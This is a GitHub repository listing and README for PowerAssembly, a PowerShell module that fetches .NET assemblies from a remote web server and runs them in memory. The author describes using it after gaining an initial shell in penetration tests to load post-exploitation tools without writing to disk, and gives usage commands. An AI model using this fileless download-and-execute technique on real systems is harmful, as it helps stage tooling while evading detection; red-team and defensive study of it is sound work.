https://github.com/phrozenio/powerassembly

Map remote .NET assemblies to memory for further invocation.
https://github.com/phrozenio/powerassembly

assembly loader powershell remote

Last synced: 7 months ago
JSON representation

Map remote .NET assemblies to memory for further invocation.

• Host: GitHub
• URL: https://github.com/phrozenio/powerassembly
• Owner: PhrozenIO
• Created: 2021-10-22T16:21:24.000Z (about 4 years ago)
• Default Branch: main
• Last Pushed: 2021-10-22T16:24:38.000Z (about 4 years ago)
• Last Synced: 2025-04-03T21:51:07.604Z (9 months ago)
• Topics: assembly, loader, powershell, remote
• Language: PowerShell
• Homepage:
• Size: 109 KB
• Stars: 40
• Watchers: 2
• Forks: 9
• Open Issues: 0
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

README

          
# PowerAssembly

Map in current PowerShell Instance Memory .NET Assemblies from remote web server.

When Assembly is mapped, you can invoke it's main with a command line argument.

The advantage of this technique is to avoid having assemblies written on disk. Everything happens in memory.

I'm using this script during my penetration tests / labs right after getting an initial shell on Windows to load other .NET Tools (Ex: ShapHound, ShapUp etc..)

# Prepare

You can use this code whether as a PowerShell Module or Classic Script.

## As a module

Choose an existing PowerShell Module Folder (see `echo $env:PSModulePath`)

Create a folder called `PowerAssembly` and place the `PowerAssembly.psm1` module inside of this new folder.

Open a new PowerShell Window and enter `Import-Module PowerAssembly`

The module is now ready for use with available functions:

* Get-MappedAssembliesList 

* Invoke-Assembly

* Get-RemoteAssembly

## As a script

You can for example copy / paste the whole `PowerAssembly.psm1` code in a new Powershell Window and enjoy offered functionalities.

## Use It

### Get-RemoteAssembly

Retrieve a .NET Assembly hosted in a remote web server.

URI must be a valid .NET Assembly file otherwise this function will raise an error.

Example: 

`Get-RemoteAssembly -RemoteAddress http://127.0.0.1/MyAssembly.exe`

or simply

`Get-RemoteAssembly http://127.0.0.1/MyAssembly.exe`

### Get-MappedAssembliesList 

Return the list of successfully mapped assemblies with its index number. Index is important to define which assembly to invoke using `Invoke-Assembly` function.

`Get-MappedAssembliesList`

### Invoke-Assembly

Invoke the main function of a target mapped assembly (defined by its index, see `Get-MappedAssembliesList`)

Example:

`Invoke-Assembly -mappedIndex 1 -argumentLine "Arg1 Arg2 Arg3"`

Notice: Index `0` = `1`

![Demo](Images/demo.png)